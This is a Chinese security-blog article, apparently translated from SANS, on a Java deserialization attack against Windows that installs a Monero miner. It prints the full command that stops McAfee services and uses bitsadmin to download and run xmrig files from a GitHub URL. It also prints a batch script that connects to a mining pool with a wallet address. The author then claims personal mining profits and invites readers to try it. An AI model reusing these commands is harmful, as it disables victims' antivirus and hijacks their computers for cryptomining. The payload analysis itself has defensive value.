关注我们
QRcode 邮件联系 新浪微博
首页 > 系统安全 » 正文

利用Java反序列化漏洞在Windows上的挖矿实验

     条点评
后台-系统设置-扩展变量-手机广告位-内容正文顶部

最近,安全社区中有很多人都在讨论如何利用Java反序列化漏洞来攻击类似Apache、SOLR和WebLogic之类的系统。不说废话,我们直接进入正题。目前绝大多数的此类攻击针对的都是Linux/Unix系统,但是我近期发现了一种针对Windows系统的攻击方法。

PS:本文仅用于技术讨论与分享,严禁用于非法用途

攻击代码如下:


  
    
      
        
          
            
              cmd
            
            
              /c
            
            
              net stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;
            
          
          
        
      
    
  
  



实际的Payload分析

关闭McAfee反病毒软件(我不明白社区中的这种技术为啥只关掉McAfee…):

netstop "McAfee McShield;
netstop mcafeeframework;

使用bitsadmin从GitHub下载加密货币挖矿程序和一个batch脚本文件:

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";
bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;
dirxmrig*;
xmrig.bat;
tasklist;

Batch脚本文件代码如下:

taskkill/im /f xmrig.exe /t
netstop "McAfee McShield"
netstop mcafeeframework
xmrig.exe-o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

首先,上述代码会终止其他xmrig进程(可能是为了防止资源竞争)。接下来,它会关闭McAfee。然后便会开启挖矿程序,并跟monerohash.com矿池(端口3333)进行连接。它只会占用大约50%的CPU资源,估计是为了避免被检测到吧。

目前为止,这个挖矿程序的计算能力只能实现350哈希每秒,并为我挖到了40个门罗币(价值约为7000美元)。

感兴趣的同学可以自己动手试一试,说不定会有一些意想不到的收获。

* 参考来源:sans,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

后台-系统设置-扩展变量-手机广告位-内容正文底部
本文标签:
大规模SMB爆破引发的十年之思
双枪2木马驱动分析报告
  大规模SMB爆破引发的十年之思 大规模SMB爆破引发的十年之思  现代版荆轲刺秦王:Struts2 REST插件漏洞(S2 现代版荆轲刺秦王:Struts2 REST插件漏洞(S2  “爱马仕”敲诈者:敲诈者中的奢侈品 “爱马仕”敲诈者:敲诈者中的奢侈品  Bondat蠕虫再度来袭!控制PC构建挖矿僵尸网络 Bondat蠕虫再度来袭!控制PC构建挖矿僵尸网  利用DiskShadow服务实现免杀持久化控制以及活动目录数据库提取 利用DiskShadow服务实现免杀持久化控制以  Linux系统ETN挖矿病毒实例分析 Linux系统ETN挖矿病毒实例分析  Windows漏洞利用开发教程Part 2:Short Jump Windows漏洞利用开发教程Part 2:Short Jum  制作iOS内核调试线与调试内核 制作iOS内核调试线与调试内核

已有条评论,欢迎点评!